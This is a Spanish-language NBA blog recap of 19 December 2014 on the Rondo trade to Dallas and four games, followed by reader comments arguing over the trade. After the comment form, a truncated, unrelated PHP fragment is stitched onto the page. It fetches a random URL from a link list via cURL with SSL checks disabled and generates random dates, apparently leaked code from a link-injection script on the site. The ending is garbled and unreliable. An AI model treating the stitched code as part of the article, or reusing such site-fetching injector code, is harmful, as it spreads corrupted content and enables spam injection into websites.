La Crónica: Pánico en la bahía

19 de December de 2014 por txusma

Ya tenemos aquí el primer gran traspaso de la temporada. Rajon Rondo y Dwight Powell llegan a los Mavs a cambio de Brandan Wright, Jameer Nelson, Jae Crowder y un par de ronda de draft. Mark Cuban vuelve a darlo todo por ganar otro anillo, algo que siempre hay que agradecerle. Ahora veremos como se adapta Rondo a Monta Ellis y a Dirk Nowitzki.

Fuera del mercado la jornada transcurrió con relativa normalidad hasta la lesión de Kevin Durant. Nada grave pero suficiente para tener que retirarse del partido ante los Warriors. Carmelo Anthony se quedó sin jugar, los Rockets cayeron ante Pelicans y los Bucks se impusieron por la mínima a los Kings. Un día completito.

Thunder 109 – Warriors 114

En la última posesión de la primera parte, Kevin Durant intentó una entrada a canasta que acabó con él en suelo, cogiéndose el tobillo y retorciéndose de dolor. Tras el pánico inicial parece que la lesión es realmente solo un esguince pero fue suficiente para trastocar un partido que pintaba histórico. Hasta ese momento, con solo 19 minutos disputados, Durant llevaba 30 puntos, todos imprescindibles para mantener a los suyos en el partido porque delante tenían a los líderes de la liga, los Warriors. Como no podía ser de otra manera, el partido bajó un punto de intensidad en la 2ª parte aunque para la videoteca quedan esos últimos minutos en los que Russell Westbrook y Stephen Curry se citaron a un duelo de canastas del que salió victorioso el jugador local.

Knicks 97 – Bulls 103

Si a este encuentro le quitas de buenas a primeras a Derrick Rose y Carmelo Anthony pierde mucho, sobretodo por el lado de New York. En los Bulls emergió la figura titánica de Jimmy Butler que consiguió 35 puntos, su récord personal, bien secundado por Pau Gasol y Aaron Brooks. De todas maneras, el partido no fue un camino de rosas para los locales. Tim Hardaway Jr asumió el liderato de los suyos con más o menos acierto ante las bajas de Melo, Shumpert y Smith y los Knicks exigieron el máximo a Chicago hasta los últimos instantes del partido.

Pelicans 99 – Rockets 90

Descomunal partido de Anthony Davis (30 puntos, 14 rebotes y 5 tapones) ante el hasta hace bien poco mejor pívot de la liga, Dwight Howard. Cierto que el de los Rockets está recuperándose todavía de una lesión pero cada día parece más claro que el cetro ya ha pasado a otras manos (sean las de Davis, sean las de Marc Gasol, sean las de Cousins). Ante la baja de Tyreke, Davis se multiplicó y entre él, Jrue Holiday y Ryan Anderson comandaron a los suyos a una importante victoria a domicilio que les consolida en la 8ª posición del Oeste, aunque lo tendrán muy difícil para resistir el empuje de los Thunder que llegan por detrás como un avión.

Bucks 108 – Kings 107

Volvió DeMarcus Cousins y ante la baja de sus hombres interiores, los Bucks decidieron jugárselo todo al juego exterior. Les salió cara. Anotaron 10 de 14 en T3 en la 1ª parte y resistieron durante todo el partido el empuje de los hombres interiores de Sacramento. Paradójicamente fue un rebote ofensivo de Zaza Pachulia a falta de 6 segundos con empate en el marcador el que acabó resultando clave para la victoria de los Bucks. Los de Kidd se ponen por encima del 50% de victorias. ¿Alguien lo habría apostado a principio de temporada?

PREMIOS

MVP: ¡Vaya 3 exhibiciones que tuvimos anoche! 34 puntos, 7 rebotes, 9 asistencias y 4 robos de Stephen Curry, 30 puntos, 14 rebotes y 5 tapones de Anthony Davis, 35 puntos, 5 rebotes, 7 asistencias y 4 robos de Jimmy Butler. 

Sorpresa: Jared Dudley se fue a los 19 puntos pero es que Cole Aldrich anotó 13 puntos y capturó 10 rebotes. A ver si se va a hacer con el puesto de titular en los Knicks.

Decepción: Como no podía ser de otra manera la vuelta de Russell Westbrook ha afectado mucho a Reggie Jackson. Ayer en 23 minutos solo fue capaz de anotar 4 puntos.

Esfuerzo en vano: Volvió Demarcus Cousins y lo hizo como se marchó. 27 puntos, 11 rebots y 5 asistencias que, sin embargo, no fueron suficientes para llevarse la victoria ante los Bucks.

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. txusma dice:
    #1

    Una vez pasado el susto de Durant podemos hablar del trade de Rondo.

    He leído los comentarios de ayer y me parece que se os olvida que Rondo será agente libre este verano. Ningún equipo con espacio (como Lakers o Knicks) te iban a dar mucho por él. Además, todos teníamos claro (y si nosotros los sabíamos tb los GM de la NBA) que era necesarios traspasar a Rondo ya mismo, para definitivamente reconstruir el equipo y empezar a dar galones a Marcus Smart. A cambio se han sacado un par de ronda y un par de jugadores interesantes como Brandan Wright (infravaloradisimo jugador a mi juicio) y Jae Crowder. Wright, al ser expiring, todavía puede ser traspasado para conseguir alguna ronda más.

    Yo no veo tan malo el movimiento de Ainge. Qué esperábais exactamente?

    (Y he pasado por el alto lo de “mejor base de la liga” pq no puede ser que quien haya dicho eso se lo crea de verdad)

      Citar

  2. Denise dice:
    #2

    Bueno, yo no veo que el traspaso sea tan bueno para los Mavs ni tan malo para los Celtics. De oidas que llegue Rondo a cambio de Nelson, Wright ó Crowder puede parecer la panacea, pero el baloncesto es mucho más que un conjunto de nombres.

    Por supuesto, aplaudo una vez más la ambición del Sr Cuban, pero con lo bien que estaba funcionando el equipo, a mi me daría miedo tocarlo. Brandan Wright era un suplente muy solido en una plantilla algo corta en la pintura. Imagino que tendrán que tirar en febrero del tipico veterano desesperado de anillos que llega mediante buy-out. Si no lo consiguen, creo que ahí tienen una vía de agua, y como a Chandler le de por lesionarse, el boquetón en la zona va a ser de pelicula.
    Respecto al tema Rondo, obviamente Nelson es peor que Rondo, pero era ideal para compatibilizarse con el verdadero base de los Mavs, Monta Ellis. El esquema de juego de los Mavs precisa de un base que no asuma bola y que se limite a quedarse abierto a la espera de que el jugón de Monta genere espacios y ventajas. Con la llegada de Rondo, Monta va a quedarse como mero ametrallador (que no es poca cosa) pero no va a tener la importancia que estaba teniendo en la creación de juego. Habrá que ver como compatibilizan, que ya hemos visto mucha estrellita junta dando palos de ciego.

    Respecto a los Celtics….que esperabais que dieran por Rondo?? Que quereis que os diga, pero creo que ningun equipo daría su jugador franquicia hoy en día por Rondo, y mas cuando es agente libre el proximo verano!!! Es cierto que podrían haber sacado algo mejor negociando con cualquier otro equipo, sobre todo algun jugador joven , pero Ainge no ha querido comerse mucho la cabeza y viendo que solo iban a conseguir jugadores medianos, han optado por la via facil de reconstruir y liberar espacio salarial haciendose con expirings y consiguiendo un montón de espacio salarial para asaltar agentes libres el próximo verano a la vez que tantean un poquito y se aseguran tener un top 5 en el próximo Draft.

      Citar

  3. Denise dice:
    #3

    Denise:
    y consiguiendo un montón de espacio salarial para asaltar agentes libres el próximo verano a la vez que tantean un poquito y se aseguran tener un top 5 en el próximo Draft.

    Quería decir tankean, no tantean.
    Estoy contigo Txusma, nuestro punto de vista es similar.

      Citar

  4. Jose A. Ramírez dice:
    #4

    Reconstruir? Tankear? Eso que es!.. vamos a ver señores, que no son los bucks o los kings, que es la franquicia con mas anillos de la historia, no deberian hacer eso, y no por el simple hecho de hacerlo, sino que asi lleva ya unas cuantas temporadas y no ha hecho absolutamente nada, y no pongais ejemplos que se lo bueno qe es smart y tambien green y todavia se le espera.. Al menos yo hubiera ido por Monroe o un pivot asi.. pero es que todo lo que se hable de este personaje es caso perdio (ainge)… lleva 5 años que no ha sido capaz de traerse un solo pivot decente a un equipo que todos sabiamos que cuando estaban el big four quizas les faltaba edo para haber arañao unos anillos mas y les seguia faltando en este tiempo de “reconstruccion”… Ujiri lo hubiera conseguido por dos entradas de cine y un ticket regalo del mcdonald…. no podeis pensar en serio que el traspaso no es malo para boston, yo creo que es un robo historico. Y si, si pienso en serio que un Rondo a su mejor nivel es el mejor base de la liga, ni lo dudo. Si entramos a debatir estilo de juego de dallas, hay dudas porque tanto ellis como parsons tambien son distribuidores pero vamos, cuban ni carlisle son tontos y este dedicandose a asistir y ellis a metrallear y parsons abierto se va a hinchar a dar asistencias… si en boston con 3 gatos da 15 o 17 cada poco en mavs ese debe ser el promedio. Con dirk no creo que haya problemas, son compatibles. Yo me gustaria poder decir que teneis o esta sobrevalorao lo de perder cualquier cosa por rondas de draft.. si, porque parece que es la panacea y se ha demostrado que influyen muchos factores y tus cartas ( si eres una franquicia grande ) no puedes gastarlas por hay. Nada, a reconstruir, pero… cuantos años mas!!??..

      Citar

  5. Denise dice:
    #5

    Jose A. Ramírez:
    Reconstruir? Tankear? Eso que es!.. vamos a ver señores, que no son los bucks o los kings, que es la franquicia con mas anillos de la historia, no deberian hacer eso, y no por el simple hecho de hacerlo, sino que asi lleva ya unas cuantas temporadas y no ha hecho absolutamente nada, y no pongais ejemplos que se lo bueno qe es smart y tambien green y todavia se le espera.. Al menos yo hubiera ido por Monroe o un pivot asi.. pero es que todo lo que se hable de este personaje es caso perdio (ainge)… lleva 5 años que no ha sido capaz de traerse un solo pivot decente a un equipo que todos sabiamos que cuando estaban el big four quizas les faltaba edo para haber arañao unos anillos mas y les seguia faltando en este tiempo de “reconstruccion”… Ujiri lo hubiera conseguido por dos entradas de cine y un ticket regalo del mcdonald…. no podeis pensar en serio que el traspaso no es malo para boston,yo creo que es un robo historico. Y si, si pienso en serio que un Rondo a su mejor nivel es el mejor base de la liga, ni lo dudo. Si entramos a debatir estilo de juego de dallas, hay dudas porque tanto ellis como parsons tambien son distribuidores pero vamos, cuban ni carlisle son tontos y este dedicandose a asistir y ellis a metrallear y parsons abierto se va a hinchar a dar asistencias… si en boston con 3 gatos da 15 o 17 cada poco en mavs ese debe ser el promedio. Con dirk no creo que haya problemas, son compatibles. Yo me gustaria poder decir que teneis o esta sobrevalorao lo de perder cualquier cosa por rondas de draft.. si, porque parece que es la panacea y se ha demostrado que influyen muchos factores y tus cartas ( si eres una franquicia grande ) no puedes gastarlas por hay. Nada, a reconstruir, pero… cuantos años mas!!??..

    Pero es que Rondo acaba contrato este verano, ¿esperas que te den a un Kemba Walker ó un Monta Ellis a cambio de él? Nadie en su sano juicio tiraría la casa por la ventana por un expiring pudiendoselo llevar gratis en verano.
    Los Celtics tienen mucha historia y más anillos que nadie, pero salvo el parentesis de 3 años de KG, PP y Ray Allen, en los últimos 20 años no son nadie en el baloncesto más alla de la historia y el halo mítico de su pabellón.

    Yo creo también que las rondas de draft están bastante sobrevaloradas, pero en este caso no las veo mal, al menos has pillado esas rondas y un decente interior como Wright a costa de un tio que se iba a pirar en verano y que ha pasado un huevo de tiempo lesionado.

    Quizás yo estoy demasiado acostumbrado a los nefastos traspasos de los Magic, y esto me tiene inmunizado, pero no lo veo tan mal ni tan robo el traspaso, oiga.

      Citar

  6. HisRoyalAirness dice:
    #6

    Os olvidáis de una cosa: DEFENSA. Rondo es una.de las mayores ladillas que existe para PG rivales. En el Oeste, por muy bien que funcionase el equipo, llegados los PO vas a tener que enfrentarte a Parker, Conley, Paul, Westbrook, Curry o Lillard y Rajon es una fiera defendiendo, un triple doble andante y que además en postemporada se convierte en jugador espectacular.
    Me dan igual sus porcentajes, si estaba promediando 11 asistencias en un equipo rodeado de mediocres. Va a estar rodeado de anotadores buenísimos y con un entrenador que para mí es top 3 de la liga.
    No dudo ni un poquito del propio jugador o del trapaso. Nos vamos a divertir

      Citar

  7. make dice:
    #7

    Os aconsejo ver la peor película de la historia del baloncesto. La vi en China y no me podía parar de reir.

      Citar

  8. Nacho dice:
    #8

    El’ Big Three’ de Boston se llevó dos anillos porque por ahí andaba un chaval dando caramelos. Y parece que después la gente empezó a hablar de eso del ‘big four’.
    Supongo que todos tenemos nuestros gustos, y es complicado hablar de ‘mejor base’ y cosas por el estilo. Pero que nadie dude que Rondo es un jugadorazo.
    A simple vista, se puede hablar de robo, si analizamos y queremos ‘cocinar’ para nuestro gusto, podremos decir que no es bueno para Dallas, pero yo creo que es un trade que (como el propio término identifica) es bueno para los dos equipos. Y a Dallas los coloca en el peldaño de los cocos del Oeste (sabiendo, que aunque no estaba ahí, podrían subirse a las barbas de cualquiera). Y como dice HisRoyal, no olvidemos la defensa Rondo.
    El problema para Dallas es que puede perder contra cualquiera de los otros 7 que se meterán en PO, pero es que ese problema lo tienen todos en el Oeste. Dudo que haya habido un año con este nivel en una sola conferencia.
    El tema Whrigt es subsanable, aunque lo que llegue (o emerja de las profundidades de la D-League, o de Europa) sea peor. Pero vamos, Txusma, por muy infravalorado que esté no es un Dirk, ni un Parsons ni un Chandler…

      Citar

  9. TheDeerHunter dice:
    #9

    Me posiciono entre los que no esperaban mucho de lo que Boston podía sacar de Rondo a estas alturas. En mi opinión lo han hecho mal, pero no por este traspaso sino por no haberlo traspasado antes, aunque él tampoco ha ayudado demasiado que yo sepa.

    No me parece robo y la prueba es que nadie ha ofrecido a Boston nada mejor. Los Mavs sacrifican un jugador como Wright que para ellos era muy valioso, obviamente apuestan por un Rondo que, adaptado y motivado para competir, es un refuerzo de primera magnitud y les coloca como uno de los equipos a batir. De hecho entiendo que sólo por la idea de un posible título los Mavs se han movido, porque en otras condiciones es duro tener que pagar por un jugador que va a quedar libre este verano.

      Citar

  10. Jose A. Ramírez dice:
    #10

    Nadie olvida que acababa contrato, todo eso dadlo por hecho que lo cuento, pero voy a lo mismo… No ha tenido el señor Ainge tiempo de sobras para haberlo hecho este verano? O ya puestos cuando desmanteló el proyecto? Porque si hubo muy buenas ofertas de trade, coño que llevaban con la cantinela tres años, no que ahora si que de verdad a recontruir, pero a partir de QUE, de QUIEN? Y si ahora no ha tenido ofertas es por eso mismo, porque la policia no es tonta y sabian que iba a la desesperada. Si rondo a hecho bien, habra dicho estoy harto de jugar para esto, o me traes algo o me piro… pues que va hacer el otro este proximo verano.. que no haya podido hacer antes.. En cuanto a rondas del draft, mirad bien porque no es nada, la de este proximo verano protegida del top.7 al 15 creo recordar, vaya mas claro, que no la van a pillar porque Dallas va a llegar minimo play-offs. La otra tambien es protegida. Parece ser que el traspaso a sido ahora porque faltan 61 dias para la fecha limite de poder traspasar a alguien.que recibas en un trade, pues como el limite son 60 la intencion es moverlos, aunque visto los antecedentes casi ya mejor me conformo con lo que han recibido. Rondo nos dara o quitara razones, y el tiempo, pero no dudeis que en play-offs no hay en competitividad nadie como el, como bien habeis dicho, triple doble andante… En fin, buena suerte a rondo y me alegro que al menos haya recalado en dallas, con cuban. Y como bien dice denise, uno ya taba inmunizao por lo de pierce y demas, pero el emblema y unico motivo de esperanza de hacer algo grande pronto se ha ido por nada, es que es nada

      Citar

  11. Azabel dice:
    #11

    en mi opinion la critica que puede caberla a ainge es no haber traspasado a Rondo ANTES, hoy por hoy su valor es ese, y eso que encontraron a un equipo dispuesta a dar alguna ronda sino ni eso

    estaba cantado qu RONDO no renovaria en Boston a fin de temporada e incluso podria ofrecersele un contrato mas bajo y presionar para llevarselo pòr menos estilo Bledsoe

    tambien es cierto que Boston no saca practicamente nada, pero es la consencuencia de mantener a un jugar algo sobrepagado, descontentoa, punto de terminar contrato y en medio de un equipo metido en la reconstruccion

      Citar

  12. Ruxixón dice:
    #12

    Es que el problema es ese,y eso estamos todos de acuerdo,el no haber traspasado antes a Rondo.Que como dijio TJNBA en twitter,Rondo lleva sonando en traspasos la pera limonera.Entiendo que Ainge ha jugado manteniendo a Rondo para poder atraer a otras estrellas de la liga (esa reunión en plan chupipandi Rondo-Love en Boston) y cuando ha comprobado que es incapaz,se ha encontrado de cruces con que el jugador viene de una lesión importante a las espaldas (aunque recuperado) y que lejos de retomar su mejor versión se ha quedado en un Rondo muy disminuido,simplemente por el nivel competitivo del equipo.Rondo no ha liderado a los nuevos Celtics,que era el papel que le tocaba,ha perdido valor de mercado y te plantas con que si quiere renovar con la franquicia va,será pagándole una morterada.Ainge lo ha visto muy claro,intento sacar algo de valor obteniendo piezas que pueda traspasar en febrero con otros jugadores y mientras le damos bola a la nueva generación.Pero vamos,queda claro que Rondo debía haber salido mucho antes.

      Citar

  13. Vader dice:
    #13

    Nacho:
    El’ Big Three’ de Boston se llevó dos anillos porque por ahí andaba un chaval dando caramelos. Y parece que después la gente empezó a hablar de eso del ‘big four’.
    Supongo que todos tenemos nuestros gustos, y es complicado hablar de ‘mejor base’ y cosas por el estilo. Pero que nadie dude que Rondo es un jugadorazo.
    A simple vista, se puede hablar de robo, si analizamos y queremos ‘cocinar’ para nuestro gusto, podremos decir que no es bueno para Dallas, pero yo creo que es un trade que (como el propio término identifica) es bueno para los dos equipos. Y a Dallas los coloca en el peldaño de los cocos del Oeste (sabiendo, que aunque no estaba ahí, podrían subirse a las barbas de cualquiera). Y como dice HisRoyal, no olvidemos la defensa Rondo.
    El problema para Dallas es que puede perder contra cualquiera de los otros 7 que se meterán en PO, pero es que ese problema lo tienen todos en el Oeste. Dudo que haya habido un año con este nivel en una sola conferencia.
    El tema Whrigt es subsanable, aunque lo que llegue (o emerja de las profundidades de la D-League, o de Europa) sea peor. Pero vamos, Txusma, por muy infravalorado que esté no es un Dirk, ni un Parsons ni un Chandler…

    ¿Dos anillos? Creo que sólo se lo llevaron el primer año… el segundo gano Lakers con un Gasol tremendo y más tarde tuvieron la mala suerte de las lesiones de KG.

    Gran traspaso para Mavericks, equipo tremendo el que han reunido!!

      Citar

  14. Nacho dice:
    #14

    Vader: ¿Dos anillos? Creo que sólo se lo llevaron el primer año… el segundo gano Lakers con un Gasol tremendo y más tarde tuvieron la mala suerte de las lesiones de KG.

    Gran traspaso para Mavericks, equipo tremendo el que han reunido!!

    Ejem… sorry.

    Partidazo de Mirotic en el FedEx. Al descanso 15 puntos con un 4/4 en triples, reboteando y bailando.

      Citar

  15. Nacho dice:
    #15

    Al final del tercer cuarto, Bulls 7 arriba, con unos Mirotic y Brooks espectaculares, el hermano mayor secando al pequeño pero flojo en ataque, y Butler.

      Citar

  16. Azabel dice:
    #16

    Corey Brewen a houston por lo q eh oido y me parece genial, los wolves ya deben salir de subasta a ver q consiguen por young y pekovic, total su temporada esta perdida y hasta q se desarrollen muhamad, wiggins y bannett me animo a decir q los proximos dos años en el ose estaran perdidos a vender y conseguir activos

    Houston tiene espacio de sobra y creo q corey encaja en su estilo rapido y de transicion, igualmente sigo viendolos como una simple amenaza y no como una potencia

      Citar

  17. Nacho dice:
    #17

    De locura en Denver. normal con el equipo Skizo de esta temporada.
    Al final los Nuggets tres arriba y los Clippers lanzando tres triples en la última jugada,
    Perfectamente podían haber pitado falta en el último, sobre la bocina, de Paul.
    Quizás eso de sacar técnicas hasta a la de la mopa en último cuarto. les habrá secado los silbatos a los árbitros.

      Citar

  18. Denise dice:
    #18

    Lo de los 76ers es una puta verguenza. Adam Silver debería trucar la Lottery y que les tocase el pick 12.
    Y lo de coleccionar 2º rondas, no le entiendo muy bien el sentido. Sí, con un poco de suerte puedes conseguir otro KJ McDaniels ó algo util, pero en la mayoría de los casos, estos jugadores de 2º ronda acaban jugando en algún lugar de Europa.

    A todo esto, ¿alguien se atreve a hacer un mock del próximo Draft?

      Citar

  19. Ruxixón dice:
    #19

    Shved y Brewer a Houston,not bad. A ver si el ruso tiene la última oportunidad de demostrar algo en la NBA o se vuelve al viejo contienente.

    Denise:
    Lo de los 76ers es una puta verguenza. Adam Silver debería trucar la Lottery y que les tocase el pick 12.
    Y lo de coleccionar 2º rondas, no le entiendo muy bien el sentido. Sí, con un poco de suerte puedes conseguir otro KJ McDaniels ó algo util, pero en la mayoría de los casos, estos jugadores de 2º ronda acaban jugando en algún lugar de Europa.

    Bueno,la inversión es poca y la ganancia puede ser mucha,si te sale 1 Ginóbili o un Isiaih Thomas de esas rondas ya merece la pena,si te salen un par de McDaniels lo mismo.

      Citar

  20. Ruxixón dice:
    #20

    Tirando de box scores,vaya batacazo para los Pelicans que llegue Portland a tu casa y te endose un 114-88 cuando la noche anterior jugaron 3 prórrogas como visitantes.Encima anulando a Anthony Davis que hacía tiempo no firmaba un partido tan malo: 7 puntos con una serie de 3-14,6 rebotes y 5 tapones.

    Vi un poco del partido Spurs @ Mavs para ver el debut de Rondo,y bueno,más que Rondo me queda el poso de que Popovich podría hacer finalista a los 76ers…presentó a Joseph-Bellinelli-Kyle Anderson-Diaw-Baynes como 5 inicial y se lo hicieron pasar putas a Dallas durante todo el partido.Sólo en el último cuarto,con 9 puntos seguidos de un Ellis percutor durante toda la noche,cedieron en el marcador.La hoja de Rondo en su línea,6 puntos,7 rebotes y 9 asistencias.

      Citar

  21. Jose Luis dice:
    #21

    en serio, Darren Collison debe ser de los peores bases titulares de la liga

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>